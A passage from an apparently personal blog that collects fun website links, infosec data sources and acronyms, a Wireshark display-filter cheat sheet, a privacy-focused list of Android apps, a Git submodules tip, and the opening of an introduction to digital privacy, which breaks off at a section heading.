Thankful to be here ๐ŸŒ
10173 words
http://aliciasykes.com@Lissy_Sykes

Epic Internet Stuff! โœจ

๐ŸŒˆ A collection of stuff I stumbled upon on the internet, and thought was pretty epic
๐Ÿฆธโ€โ™‚๏ธ Credit to the legends behind each of these sites

๐ŸŒ Each website is either amazing, genius, funny, random or useful
๐Ÿšง Work in progress- I continue to add stuff to this list
๐Ÿ”ก Sorted alphabetically

So here it is, enjoy! ๐Ÿคฉ

  • 1001 Albums Generator - Gives you a new album to listen to everyday
  • Acapella Extractor - Isolates voice from any track/ removes music and background
  • Ask Nature - Search for a query, to find how nature has adapted to solve problems
  • BBC Sound Effects - A database of all 16,000+ sound effects as .wav, created & used by the UK's BBC
  • Bilingual baby name finder - Useful to find names that can be pronounced
  • Bomb Blast - Search a location, and nuclear weapon, to see the damage area
  • Cinetrii - Analyses reviews to infer possible inspirations behind a film
  • City Extremes - Lookup any city, and find the closest and furthest geographic cities
  • Classic Reload - A series of retro emulators in the browser
  • Connected Papers - Visually shows connections between academic journals
  • Conversao - Instantly convert a unit to all others
  • Cryptovoxels - A virtual world
  • Cursor Dance Party - Real-time cursor dance party
  • Desk Spacing - Create your own virtual desk setup (or r/BattleStation!)
  • Dr Meme - Meme generator (without watermarks, ads or sign up)
  • Earth Polychromatic Imaging Camera - Hourly photos of the Earth from NASA
  • Entropy by Aatish Bhatia - Interactive article, explaining entropy with sheep
  • FSymbols Emoticons - Cpoy/ Paste text-based emojis
  • Flag Waver - Generates a waving flag for any image (some very clever coding, by @krikienoid)
  • Flipanim - Create flipbook animations
  • Fluid Simulation - Impressive, and kinda relaxing, WebGL dynamic simulation of fluid
  • Forgotify - Listen to a song that's never been heard before on Spotify (produces some questionable tracks)
  • Forvo - Pronunciation Dictionary
  • Free Learning List - A collection of awesome educational resources from around the internet
  • Good Tricks - Tons of magic tricks
  • Hacker Typer - A classic.. pretend to be a hacker
  • HelpMap - A website that lets you find local charities to support
  • Hemingway - Analyses a writing, and suggests edits to make it easier to read
  • How long to Read - Tells you how long it will take to read a certain book
  • IMDB Compare Shows - Compares ratings over time of TV shows
  • Invite Rick - Invite Rick Astlet to Rick Roll your Zoom meetings
  • Life in Months - Create a grid of your life
  • Lines - Draw a line, and let Google Earth complete the picture
  • ListeningTogether - Shows when two people start listening to the same song, at the same time, via Spotify
  • Localingual - A map that you can click on, to hear voices from around the world
  • MSOutlook-Reddis - Makes Reddit look like Microsoft Outlook (useful for work)
  • Measure of Things - See real-world comparisons of a measurement
  • Moon Today - Browse the moons craters, mountains and lava channels
  • MorseCode.me - Morse Code-only chat room
  • Muscle Wiki - Select a muscle, for exercises on how to work it
  • Music Roamer - Finds music from similar artists you love:
  • My90sTV - Simulates a 90's TV, with big varity of program - so nostalgic!
  • Mystery Search - Search for something, and receive the results for whatever the previous person searched for
  • Opslagify - Calculates how much storage you'll need to download your Spotify playlists
  • Orb.Farm - Relaxing lil game, where you create your own eco-system
  • OwnersMan - All car manuals
  • Paper Plotter - Create math functions out of paper
  • Physics Simulations - Physics simulations
  • Playlist Machinery - Create a (nearly) seamless playlist between (almost) any two artists
  • QR Picture - Turn any picture into a working QR code
  • Radio Garden - Listen to Live Radio from all over the world
  • Radiooooo - Pick a country, and a decade, to hear the songs that would have been on the radio
  • RainbowHunt - Amazing rain simulation, built with WebGL
  • RelaxCalm - Do nothing for 90 Seconds
  • Remove BG - Automatically removes the background of any image
  • RubikSolve - Rrbik's Cube Solver
  • ShadyURL - A URL Shortener, that makes legitimate websites sound dodgy
  • Shortcuts - Keyboard shortcuts for lots of apps
  • Sideways Dictionary - Like a dictionary, but uses analogies to simply explain infosec definitions
  • Sketch 2 Code - Convert any hand-drawn wireframe, into HTML code
  • SnapDrop - Share files with other devices on your network, no signup or software required
  • SoundeScape - 3-Dimensional, generative sound environments for Focus, Relax or Sleep
  • Strobe.Cool - Weirdly hypothesizing illusion (Warning: Strobe)
  • Super Cook - Search recipes based on what's in your fridge
  • Temark - Convert any bit of long writing, into a short summary
  • Terms of Service; Didn't Read - Professionally written, short summaries of various website's Terms of Service
  • The Faces of Facebook - Shows tons of public facebook profile pictures (broken)
  • The Google Cemetery - Collection of all 162+ products that Google killed
  • The Skullery - Collection of free, well-presented and easy-to-follow recipes
  • TitleScraper - Scrapes any given sub-reddit, and looks for commonly used words and upvotes
  • Toys from Trash - Hundreds of Science projects using common household items & trash
  • Travel Time - Travel time calculator, great for finding somewhere to live for a commute
  • TypeLit - Practice touch typing, by typing out classic novels
  • U Meet Me - Find meeting places between 2 addresses
  • Unim.Press - Read Reddit like a newspaper
  • Unogs - Search for a movie, to find which country Netflix it is on (useful for choosing VPN location)
  • Virtual Vacation - City Guesser Game - Shows parts of cities, to guess location (great for quizzes)
  • VisualPing - Monitor website for changes
  • WebAmp - HTML5 implementation of WinAmp in-browser
  • What to Watch on TV - Find TV shows, based on IMDB ratings
  • Wildlife Africam - Live wildlife cameras in Africa
  • Winamp Skin Museum - I don't know why...
  • Worlds Greatest Singers - Vocal ranges of the top singers visualized
  • Zoom Earth - Live satellite photos of Earth

Thanks for visiting ๐Ÿฅฐ

I always love discovering new eipc internet stuff, so if you know of something I should check out, drop me a line at alicia at omg dot lol

Fun with Real-Time Data ๐ŸŒ 

Fun with live data_banner

A curated collection of data-related awesomeness, with a focus on internet, communication & security
Work in progress- I'm continuing to update the list, whenever I come across something epic

My respect goes out to the legends behind each of these projects ๐Ÿ‘


Awesome Real-Time Data Visualizations


Info Sec - Databases, APIs, References

Want to build your own live data visualization? The below data sources may be of help

  • Exodus - Trackers in Android Apps
  • Exploit Database - A database or Current software vulnerabilities
  • URLScan - Service scanning for malicious domains, with historical results
  • Dehashed - Data Breaches and Credentials
  • VirusTotal - Detailed virus scans of software
  • Abuse IP DB - Database of IPs reported for abuse
  • SnusBase - Long standing database hosting breached data
  • OpenPhish - A feed of current phishing endpoints
  • HashToolkit - Database of 'cracked' hashes
  • SecLists - Starter list of leaked databases, passwords, usernames etc (Great for programming)
  • Qualys SSL Pulse - A continuous and global dashboard for monitoring the quality of SSL / TLS support over time across 150,000 SSL- and TLS-enabled websites, based on Alexaโ€™s list of the most popular sites in the world
  • Tor Bulk Exit List - List of all exit nodes (IP) in use on the Tor network

Info Sec - Research & Results

A collection of interesting studies that have collected, analysed and presented findings using internet data

  • Internet Census Data - Includes data on address space allocation, traffic, DNS, service enumeration, internet outages and other internet topology data
  • Web Tracking Data by Princeton University - This is the largest and most detailed analysis of online tracking to date, and measures both stateful (cookie-based) and stateless (fingerprinting-based) tracking. The crawls were made with OpenWPM
  • Who has your Back? by EFF - Anual report assessing how companies handle personal data
  • Lists of Websites Abusing Session Replay - Third-party sesssion replay scripts, record all your acions and allow them to be watched by a human. This list of websites include this
  • Sensor Access Data - A Crawl of the Mobile Web Measuring Sensor Accesses, Illinois
  • Canalys Newsroom - Research Studies on Security, Privacy, Technology and Finance
  • Data Never Sleeps - An infographic visualizing how much data is generated every minute (2019)
  • What they Know about You - An Infographic showing what information are Giant Tech Companies collecting from you (2020)

Finally- Here's a selection of pretty screenshots...

A selection of pretty screenshots

[REFERENCE] InfoSec Abbreviations ๐Ÿ”ก

Background: While getting started in information security, I kept coming across acronyms I wasn't familiar with/ had forgotten. So I have started compiling a list, for future reference. I will keep this list updated, as I go along ๐Ÿ˜š

Common InfoSec Abbreviations

  • AES: Advanced Encryption Standard
  • C2: Command & Control (sometimes CC)
  • CBSP: Cloud-Based Security Providers
  • CSP: Content Security Policy
  • CORS: Cross-Origin Resource Sharing
  • CVSS: Common Vulnerability Scoring System
  • DAST: Dynamic Application Security Testing
  • DLP: Data-loss Prevention
  • DDoS: Distributed Denial of Service
  • DES: Data Encryption Standard
  • DOS: Dinial of Service
  • DSA: Digital Signature Algorithm
  • EDR: Endpoint Detection & Response
  • IPSec: Internet Protocol Security
  • IIoT: (Industrial) Internet of Things
  • MFA: Multi-Factor Authentication
  • PAM: Privilege Access Management
  • PIM: Privilege Identity Management
  • RAT: Remote Adimistration Tool
  • SAST: Static Application Security Testing
  • SPF: Sender Policy Framework
  • SSE: Server-Side Encryption
  • STS: Security Token Service
  • TLS: Transport Layer Security
  • WAF: Web Application Firewall
  • WAP: Web Application Protection
  • XSS: Cross-Site Scripting

Of course, there are other, much more complete glossaries, but they can get overwhelming- these are the basics, and my personal resource. For some much more complete lists, see:

๐Ÿก† A lot of acronyms: via InfoSec Matter
๐Ÿก† Glossary of Terms: via NICCS (National Initiative for Cybersecurity Careers and Studies in the US)

[REFERENCE] Wireshark Display Filters ๐Ÿ’ป

Wirechark has some comprehensive packet filtering capabilities, and display filters let you utilize these multi-pass packet processing capabilities. This goes far beyond just filtering based on IP, port and protocol.

Essential Links:

You can debug filters using the dftest command

Cheat Sheet

I created this list from the Wiki, to be a Ctrl + F personal reference to common display filters

Operators

  • eq or ==
  • ne or !=
  • gt or >
  • lt or <
  • ge or >=
  • le or <=

Logic

  • and or && - Logical AND
  • or or || - Logical OR
  • xor or ^^ - Logical XOR
  • not or ! - Logical NOT
  • [n] [โ€ฆ] - Sub-String Operator

Ethernet

  • eth.addr
  • eth.dst
  • eth.ig
  • eth.len
  • eth.lg
  • eth.multicast
  • eth.src
  • eth.trailer
  • eth.type

IEEE 802.1Q

  • vlan.cfi
  • vlan.etype
  • vlan.id
  • vlan.len
  • vlan.priority
  • `vlan.trailer

IPv4

  • ip.addr
  • ip.checksum_bad
  • ip.checksum_good
  • ip.checksum
  • ip.dsfield.ce
  • ip.dsfield.dscp
  • ip.dsfield.ect
  • ip.dsfield
  • ip.dst_host
  • ip.dst
  • ip.flags.df
  • ip.flags.mf
  • ip.flags.rb
  • ip.flags
  • ip.frag_offset
  • ip.fragment.error
  • ip.fragment.multipletails
  • ip.fragment.overlap.conflict
  • ip.fragment.overlap
  • ip.fragment.toolongfragment
  • ip.fragment
  • ip.fragments
  • ip.hdr_len
  • ip.host
  • ip.id
  • ip.len
  • ip.proto
  • ip.reassembled_in
  • ip.src_host
  • ip.src
  • ip.tos.cost
  • ip.tos.delay
  • ip.tos.precedence
  • ip.tos.reliability
  • ip.tos.throughput
  • ip.tos
  • ip.ttl
  • ip.version

IPv6

  • ipv6.addr
  • ipv6.class
  • ipv6.dst_host
  • ipv6.dst_opt
  • ipv6.dst
  • ipv6.flow
  • ipv6.fragment.error
  • ipv6.fragment.id
  • ipv6.fragment.more
  • ipv6.fragment.multipletails
  • ipv6.fragment.offset
  • ipv6.fragment.overlap.conflict
  • ipv6.fragment.overlap
  • ipv6.fragment.toolongfragment
  • ipv6.fragment
  • ipv6.fragments
  • ipv6.hlim
  • ipv6.hop_opt
  • ipv6.host
  • ipv6.mipv6_home_address
  • ipv6.mipv6_length
  • ipv6.mipv6_type
  • ipv6.nxt
  • ipv6.opt.pad1
  • ipv6.opt.padn
  • ipv6.plen
  • ipv6.reassembled_in
  • ipv6.routing_hdr.addr
  • ipv6.routing_hdr.left
  • ipv6.routing_hdr.type
  • ipv6.routing_hdr
  • ipv6.src_host
  • ipv6.src
  • ipv6.version

ARP

  • arp.dst.hw_mac
  • arp.dst.proto_ipv4
  • arp.hw.size
  • arp.hw.type
  • arp.opcode
  • arp.proto.size
  • arp.proto.type
  • arp.src.hw_mac
  • arp.src.proto_ipv4

TCP

  • tcp.ack
  • tcp.checksum_bad
  • tcp.checksum_good
  • tcp.checksum
  • tcp.continuation_to
  • tcp.dstport
  • tcp.flags.ack
  • tcp.flags.cwr
  • tcp.flags.ecn
  • tcp.flags.fin
  • tcp.flags.push
  • tcp.flags.reset
  • tcp.flags.syn
  • tcp.flags.urg
  • tcp.flags
  • tcp.hdr_len
  • tcp.len
  • tcp.nxtseq
  • tcp.options.cc
  • tcp.options.ccecho
  • tcp.options.ccnew
  • tcp.options.echo_reply
  • tcp.options.echo
  • tcp.options.md5
  • tcp.options.mss_val
  • tcp.options.mss
  • tcp.options.qs
  • tcp.options.sack_le
  • tcp.options.sack_perm
  • tcp.options.sack_re
  • tcp.options.sack
  • tcp.options.time_stamp
  • tcp.options.wscale_val
  • tcp.options.wscale
  • tcp.options
  • tcp.pdu.last_frame
  • tcp.pdu.size
  • tcp.pdu.time
  • tcp.port
  • tcp.reassembled_in
  • tcp.segment.error
  • tcp.segment.multipletails
  • tcp.segment.overlap.conflict
  • tcp.segment.overlap
  • tcp.segment.toolongfragment
  • tcp.segment
  • tcp.segments
  • tcp.seq
  • tcp.srcport
  • tcp.time_delta
  • tcp.time_relative
  • tcp.urgent_pointer
  • tcp.window_size

UDP

  • udp.checksum_bad
  • udp.checksum_good
  • udp.checksum
  • udp.dstport
  • udp.length
  • udp.port
  • udp.srcport

Frame Relay

  • fr.becn
  • fr.chdlctype
  • fr.control.f
  • fr.control.ftype
  • fr.control.n_r
  • fr.control.n_s
  • fr.control.p
  • fr.control.s_ftype
  • fr.control.u_modifier_cmd
  • fr.control.u_modifier_resp
  • fr.control
  • fr.cr
  • fr.dc
  • fr.de
  • fr.dlci
  • fr.dlcore_control
  • fr.ea
  • fr.fecn
  • fr.lower_dlci
  • fr.nlpid
  • fr.second_dlci
  • fr.snap.oui
  • fr.snap.pid
  • fr.snaptype
  • fr.third_dlci
  • fr.upper_dlci

ICMPv6

  • icmpv6.all_comp
  • icmpv6.checksum_bad
  • icmpv6.checksum
  • icmpv6.code
  • icmpv6.comp
  • icmpv6.haad.ha_addrs
  • icmpv6.identifier
  • icmpv6.option.cga
  • icmpv6.option.length
  • icmpv6.option.name_type.fqdn
  • icmpv6.option.name_type
  • icmpv6.option.name_x501
  • icmpv6.option.rsa.key_hash
  • icmpv6.option.type
  • icmpv6.option
  • icmpv6.ra.cur_hop_limit
  • icmpv6.ra.reachable_time
  • icmpv6.ra.retrans_timer
  • icmpv6.ra.router_lifetime
  • icmpv6.recursive_dns_serv
  • icmpv6.type

PPP

  • ppp.address
  • ppp.control
  • ppp.direction
  • ppp.protocol

RIP

  • rip.auth.passwd
  • rip.auth.type
  • rip.command
  • rip.family
  • rip.ip
  • rip.metric
  • rip.netmask
  • rip.next_hop
  • rip.route_tag
  • rip.routing_domain
  • rip.version

MPLS

  • mpls.bottom
  • mpls.cw.control
  • mpls.cw.res
  • mpls.exp
  • mpls.label
  • mpls.oam.bip16
  • mpls.oam.defect_location
  • mpls.oam.defect_type
  • mpls.oam.frequency
  • mpls.oam.function_type
  • mpls.oam.ttsi
  • mpls.ttl

BGP

  • bgp.aggregator_as
  • bgp.aggregator_origin
  • bgp.as_path
  • bgp.cluster_identifier
  • bgp.cluster_list
  • bgp.community_as
  • bgp.community_value
  • bgp.local_pref
  • bgp.mp_nlri_tnl_id
  • bgp.mp_reach_nlri_ipv4_prefix
  • bgp.mp_unreach_nlri_ipv4_prefix
  • bgp.multi_exit_disc
  • bgp.next_hop
  • bgp.nlri_prefix
  • bgp.origin
  • bgp.originator_id
  • bgp.type
  • bgp.withdrawn_prefix

ICMP

  • icmp.checksum_bad
  • icmp.checksum
  • icmp.code
  • icmp.ident
  • icmp.mtu
  • icmp.redir_gw
  • icmp.seq
  • icmp.type

DTP

  • dtp.neighbor
  • dtp.tlv_len
  • dtp.tlv_type
  • dtp.version
  • vtp.neighbor

VTP

  • vtp.code
  • vtp.conf_rev_num
  • vtp.followers
  • vtp.md5_digest
  • vtp.md_len
  • vtp.md
  • vtp.seq_num
  • vtp.start_value
  • vtp.upd_id
  • vtp.upd_ts
  • vtp.version
  • vtp.vlan_info.802_10_index
  • vtp.vlan_info.isl_vlan_id
  • vtp.vlan_info.len
  • vtp.vlan_info.mtu_size
  • vtp.vlan_info.status.vlan_susp
  • vtp.vlan_info.tlv_len
  • vtp.vlan_info.tlv_type
  • vtp.vlan_info.vlan_name_len
  • vtp.vlan_info.vlan_name
  • vtp.vlan_info.vlan_type

HTTP

  • http.accept_encoding
  • http.accept_language
  • http.accept
  • http.authbasic
  • http.authorization
  • http.cache_control
  • http.connection
  • http.content_encoding
  • http.content_length
  • http.content_type
  • http.cookie
  • http.date
  • http.host
  • http.last_modified
  • http.location
  • http.notification
  • http.proxy_authenticate
  • http.proxy_authorization
  • http.proxy_connect_host
  • http.proxy_connect_port
  • http.referer
  • http.request.method
  • http.request.uri
  • http.request.version
  • http.request
  • http.response.code
  • http.response
  • http.server
  • http.set_cookie
  • http.transfer_encoding
  • http.user_agent
  • http.www_authenticate
  • http.x_forwarded_for

Example Usage

(Adapted from Chris Greer's Blog Post)

  • ip.addr == 10.0.0.1 - Sets a filter for any packet with 10.0.0.1, as either the source or dest
  • ip.addr==10.0.0.1 && ip.addr==10.0.0.2 - sets a conversation filter between the two defined IP addresses
  • tcp.time_delta > .250 - sets a filter to display all tcp packets that have a delta time of greater than 250mSec in the context of their stream
  • tcp.port==4000 - Sets a filter for any TCP packet with 4000 as a source or dest port
  • tcp.flags == 0x012 - Displays all TCP SYN/ACK packets - shows the connections that had a positive response. Related to this is tcp.flags.syn==1
  • ip.addr == 10.0.0.0/24 - Shows packets to and from any address in the 10.0.0.0/24 space
  • frame contains traffic - Displays all packets that contain the word โ€˜trafficโ€™. Excellent when searching on a specific string or user ID
  • !(arp or icmp or stp) - Masks out arp, icmp, stp, or whatever other protocols may be background noise. Allowing you to focus on the traffic of interest
  • eth[0x47:2] == 01:80 - This is an example of an offset filter. It sets a filter for the HEX values of 0x01 and 0x80 specifically at the offset location of 0x47
  • tcp.analysis.flags && !tcp.analysis.window_update - Displays all retransmissions, duplicate acks, zero windows, and more in the trace. Helps when tracking down slow application performance and packet loss. It will not include the window updates, since these aren't really important for me to see in most cases

My Top 50 Android Apps ๐Ÿ“ฑ

These are all the Android applications that I use often, each app on this list serves a purpose and adds value to my day. The developers behind every one of these apps have done an amazing job, and for that, I am thankful. This in part is my motivation for writing this list

This is, in no way a list of ultra-secure, privacy-respecting or fully FOSS apps. In fact, the very idea of having 50 apps on your device goes against the minimalist security principle, and increases attack surface. However, I do carefully manage permissions and connectivity features, blocking internet access for all apps that shouldn't need it

Click the App Name to visit website, the GitHub icon to view source code, and the F-Droid/ Google Play icon to download APK ๐Ÿ˜Š
Note: Any non-opensource apps are indicated with a red cross โŒ

Essentials:

  • Aegis - 2-Factor Authentication Token Manager F-Droid GitHub
  • KeePassDX - Password Manager for KeePass files F-Droid GitHub
  • Standard Notes - Secure, Encrypted Cross-Platform Notes F-Droid GitHub
  • K-9 Mail - IMAP Mail Client with Multi-Account Support F-Droid GitHub
  • ProtonMail - Official Client for ProtonMail (PGP Encrypted Email) Google-Play GitHub
  • SimpleLogin - PGP Encrypted Mail Forwarder for Multiple Aliases F-Droid GitHub
  • EteSync - Secure, Encrypted Sync Engine for Calendar, Contacts and Tasks F-Droid GitHub
  • xBrowserSync - Secure Bookmark Storage and Browser Syncing F-Droid GitHub
  • OpenKeychain - OpenPGP for encrypting files and communications F-Droid GitHub
  • EDS Lite - Managing files in encrypted containers F-Droid GitHub

Networking:

  • NetGuard - Firewall supporting per-app internet blocking and advanced rules F-Droid GitHub
  • Orbot - Routes traffic via Tor network F-Droid Git
  • Mullvad - My VPN of choice F-Droid GitHub
  • WireGuard - VPN for connecting to private networks F-Droid Git
  • Network Manager Pro - Complete suit of Network tools Google-Play โŒ

Communication

  • Signal - E2E Encrypted Messaging, (not anonymous, as it's linked to mobile number) Google-Play GitHub
  • Briar - Extremity secure and robust communication which can also work locally (via WiFi or Bluetooth) F-Droid Git
  • Element - Matrix Client (Matrix is a privacy-respecting P2P encrypted multi-user chat platform) F-Droid GitHub

Productivity Basics

  • FireFox Focus - Fast & Private browser, with no persistent history and automatic tracker blocking F-Droid GitHub
  • GitHub - Official GitHub client, for managing issues, pull-requests and browsing repositories Google-Play
  • Hour Blocks - Simple hour-by-hour day planner, with calendar support Google-Play โŒ
  • Open Camera - Full-featured, privacy-respecting camera app with good feature support F-Droid Git
  • OsmAnd~ Maps - Maps with offline support, public transport directions and turn-by-turn navigation F-Droid GitHub
  • Simple Calendar - Highly customizable, privacy-respecting, offline, easy calendar app F-Droid GitHub
  • Simple Calculator - Just a Calculator app F-Droid GitHub
  • Simple Contacts - Privacy-respecting contacts manager F-Droid GitHub
  • Simple Dialer - Privacy-respecting cellular phone application F-Droid GitHub
  • Tasks - Secure Todo List App with CalDav Sync Capabilities F-Droid GitHub
  • Geometric Weather - Simple weather app, with clean UI, 15-day forecast and detailed outlook Google-Play GitHub
  • Tile - Companion app for Tile Bluetooth Finders (useful for finding keys, wallet, phone, TV remote etc) Google-Play โŒ
  • VNC Viewer - Virtual remote desktop app, to access and control PC, Server or other device Google-Play โŒ
  • Bible - An offline Bible app, with audio and daily plans Google-Play โŒ
  • Loyalty Card Keychain - Securely stores and displays store loyalty cards, with good protocol support F-Droid GitHub

Utilities

  • AdAway - Ad and tracker blocker that uses hosts file (requires root) F-Droid GitHub
  • SuperFreezZ - Entirely freeze all background activities on a per-app basis F-Droid Git
  • XPrivacyLua - Mocks app permissions fake data (solving the issues caused by revoking permissions) F-Droid GitHub
  • App Manager - Package manager & viewer, with useful privacy & security features F-Droid GitHub
  • OAndBackupX - Backup apps and data, without the need for Google F-Droid GitHub
  • SecScanQR - Fully-featured, privacy-respecting QR code & barcode scanner & generator F-Droid GitHub
  • Island - Isolate and compartmentalize apps for privacy Google-Play GitHub
  • Powerful Monitor - Fully-featured system monitor and RAM cleaner, no trackers Google-Play โŒ
  • Exodus - Shows which trackers each app has within it's APK F-Droid GitHub

Home Control

  • FlutterHole - Easy control over local Pi Hole instance F-Droid GitHub
  • Home Assistant - Control all smart home and IoT devices, via self-hosted HASS.io server F-Droid GitHub
  • Fing - Home Network Security Google-Play โŒ
  • Ping Tools - Basic uptime monitor for your servers Google-Play โŒ

Media

  • Plex - Stream media from home Plex Server Google-Play GitHub
  • PocketCasts - Podcast Player with Advanced Listening Tools and OPML Support Google-Play โŒ
  • Spotify - Music Streaming and Downloads (Premium) Google-Play GitHub โŒ
  • Transistor - Internet Radio F-Droid GitHub
  • NewPipe - YouTube Player F-Droid GitHub

Misc:

  • Developer Assistance - Powerful debugging app for Android development Google-Play GitHub
  • Dev Tools - Essential toolkit for Android development, including decompiling Google-Play GitHub
  • CloudMare - CloudFlare Application Management F-Droid GitHub

Device Customization

  • Total Launcher - Highly Customizable Android Launcher Google-Play โŒ
  • KWGT - Advanced Widget Creator Google-Play โŒ
  • Automate - Device Macros and Automation, with Home Assistant Compatibility Google-Play โŒ



Notes

Exodus Privacy

ฮตxodus is an awesome service, I don't know how I managed before it came about. It's a privacy audit platform that scans Android APKs for links to known trackers, and generated up-to-date reports for most apps available through Google Play. You can either search an app though their website, or use the Exodus App that scans all installed apps, showing which trackers and permissions they include

NetGuard

I heavily rely on NetGuard, which I use to completely block internet access for all apps that don't absolutely require a network connection. For the remaining applications I control how and when they can connect, usually blocking any network access when the screen is off. An alternative to NetGuard, is TrackerControl, that allows the blocking of individual trackers on a per-app basis, however I use Pi Hole for blocking adds & trackers instead.

Faraday

Typically, when I'm not activity using my phone, I keep it in my Silent Pocket Faraday case, which has the added benefit of preserving battery life.

VPN

When I do connect, I VPN into my home network (I wish I could use WireGuard for this, but currently NetGuard only supports OpenVPN protocol). This provides some additional protection thanks to my firewall, and Pi-Hole is used to block ads and some trackers, it also allows secure access to my locally self-hosted services. All traffic on my home network is routed though Mullvad VPN. Even though this adds several extra hops to my phone's traffic, it doesn't seem to affect speed too much, and the above benefits make it worthwhile.

Orbot

Sometimes I use Orbot as backup service, but I do find this to be slower, and with a lot of extra CAPTCHAs. Another similar app, but with greater controls is orWall, by @EthACKdotOrg, which is useful for forcing selected apps to use Tor.

Automate

Automate is a really handy app for running simple macros and device automation (however it is unfortunately not open source). One of the things I use it for, is turning off WiFi and other connectivity features when I'm not using them. I also have my phone enter airplane mode at nighttime, in order to not distract me (requires root). (Easer an LibreTasks are open source alternatives, but with less functionality)

Island

Island is a really useful sandbox environment, allowing you to clone selected apps and run them in an isolated box, preventing it from accessing your personal data, or device information, and it lets you freeze apps, preventing background tasks from running. It works by utilizing Androids Work Profile feature. It's certainly not fool-proof though, any security bugs in the Android system could lead to data leaks. It's currently not available on F-Droid, an alternative app is Shelter, built by @PeterCxy although I have found it to be less stable.

Monitoring Apps

The more apps installed on a device, the larger the attack surface. 50 is probably too many. The average smart phone user has 100 apps installed on their device- that's defiantly too many. It's important to know what is running in the background, remove apps you no longer use often or that have invasive trackers. App Manager is a really useful package manager, that makes uninstalling unneeded apps easy. Exodus is useful for finding out which trackers are included in each app.


The following apps are not fully open-source, and depending on your threat model, you may wish to avoid them:
Network Manager Pro, Hour Blocks, Tile, VNC Viewer, YouVision Bible, Fing, Ping Tools, PocketCasts, Spotify, Total Launcher, KWGT, Automate
The following apps are open source, but not available on F-Droid, again, this may be a deal breaker for you:
Island, ProtonMail, Signal, GitHub, Geometric Weather, Plex, Developer Assistant, Dev Tools

[QUICK-TIP] Git Submodules

I came across a directory within the DuckDuckGo Android app source code, that when clicked, linked directly to an external repository. I'd not seen this before, and thought it was pretty neat, and it could be insanely useful. I spent a short while Google'ing, trying to figure out the name of this concept, and how to execute it. Eventually found it- it is a Git Tool, called Submodules.

Quick Start

It's simple to add a submodule into your repository, with the following line:

git submodule add https://github.com/<user>/<repo> <path/to/save/at>

Additional Options

  • When cloning a project containing submodules, you will need to use the --recursive flag, if you wish to download all submodules also
  • To update the code within the submodules repositories, you will need to run git submodule update --init --recursive

Problems with Submodules

It's worth nothing, that this may work well for simple use cases, but would not be practical at all for referencing multiple packages. Usually a dependency management system (such as Cargo, NPM, RubyGems, Go Modules etc.) is a better solution.

Git doesn't automatically download submodules after clone (unless you use the --recursive flag), so if this is required for the project to run, you'll need to either document this, or add something into your build script to grab the submodules. Same goes for updates- submodules will not be fetched with a git pull, so git submodule update needs to be run.

There are also the potential security and stability issues this could cause, if you do not manage the repo being included. All in all, submodules are awesome, but for only a very particular use case.

Further Links

Example: https://github.com/duckduckgo/Android/tree/develop/submodules
Git Documentation: https://git-scm.com/book/en/v2/Git-Tools-Submodules
Git Module File Documentation: https://www.git-scm.com/docs/gitmodules
Git Submodule Documentation: http://www.git-scm.com/docs/git-submodule
GitModules File Documentation: https://www.git-scm.com/docs/gitmodules
GitHub Modules: https://github.blog/2016-02-01-working-with-submodules

Introduction to Digital Privacy & Security ๐Ÿ”

TLDR; Privacy is a fundamental right, and essential to democracy, liberty, and freedom of speech. Our privacy is being abused by governments (with mass-surveillance), corporations (profiting from selling personal data), and cyber criminals (stealing our poorly-secured personal data and using it against us). Security is needed in order to keep your private data private, and good digital security is critical to stay protected from the growing risks associated with the war on data.


What is Personal Data?

Personal data is any information that relates to an identified or identifiable living individual. Even data that has been de-identified or anonymized can often still be used to re-identify a person, especially when combined with a secondary data set.

This could be sensitive documents (such as medical records, bank statements, card numbers, etc), or user-generated content (messages, emails, photos, search history, home CCTV, etc) or apparently trivial metadata (such as mouse clicks, typing patterns, time spent on each web page, etc)

How is Data Collected?

One of the most common data collection methods is web tracking. This is when websites use cookies, device fingerprints, and other methods to identify you, and follow you around the web. It is often done for advertising, analytics, and personalization. When aggregated together, this data can paint a very detailed picture of who you are.

How is Data Stored?

Data that has been collected is typically stored in databases on a server. These servers are rarely owned by the companies managing them, 56% of servers are owned by Amazon AWS, Google Cloud, and Microsoft Azure. If stored correctly the data will be encrypted, and authentication required to gain access. However that usually isn't the case, and large data leaks occour almost dailey. As well as that data breaches occur, when an adversary compromises a database storing personal data. In fact, you've probably already been caught up in a data breach (check your email, at have i been pwned)

What is Personal Data Used For?

Data is collected, stored and used by governments, law enforcement, corporations and sometimes criminals:

Government Mass Surveillance

Intelligence and law enforcement agencies need surveillance powers to tackle serious crime and terrorism. However, since the Snowden revelations, we now know that this surveillance is not targeted at those suspected of wrongdoing- but instead the entire population. All our digital interactions are being logged and tracked by our very own governments.

Mass surveillance is a means of control and suppression, it takes away our inerrant freedoms and breeds conformity. When we know we are being watched, we subconsciously change your behavior. A society of surveillance is just 1 step away from a society of submission.

Corporations

On the internet the value of data is high. Companies all want to know exactly who you are and what you are doing. They collect data, store it, use it and sometimes sell it on.

Everything that each of us does online leaves a trail of data. These traces make up a goldmine of information full of insights into people on a personal level as well as a valuable read on larger cultural, economic and political trends. Tech giants (such as Google, Facebook, Apple, Amazon, and Microsoft) are leveraging this, building billion-dollar businesses out of the data that are interactions with digital devices create. We, as users have no guarantees that what is being collected is being stored securely, we often have no way to know for sure that it is deleted when we request so, and we don't have access to what their AI systems have refered from our data.

Our computers, phones, wearables, digital assistants and IoT have been turned into tracking bugs that are plugged into a vast corporate-owned surveillance network. Where we go, what we do, what we talk about, who we talk to, and who we see โ€“ everything is recorded and, at some point, leveraged for value. They know us intimately, even the things that we hide from those closest to us. In our modern internet ecosystem, this kind of private surveillance is the norm.

Cybercriminals

Hackers and cybercriminals pose an ongoing and constantly evolving threat. With the ever-increasing amount of our personal data being collected and logged - we are more vulnerable to data breaches and identity fraud than ever before.

In the same way, criminals will go to great lengths to use your data against you: either through holding it ransom, impersonating you, stealing money or just building up a profile on you and selling it on, to another criminal entity.


Why Data Privacy Matters

Data Privacy and Freedom of Speech

Privacy is a fundamental right, and you shouldn't need to prove the necessity of fundamental right to anyone. As Edward Snowden said, "Arguing that you don't care about the right to privacy because you have nothing to hide is no different than saying you don't care about free speech because you have nothing to say". There are many scenarios in which privacy is crucial and desirable like intimate conversations, medical procedures, and voting. When we know we are being watched, our behavior changes, which in turn suppresses things like free speech.

Data Can Have Control Over You

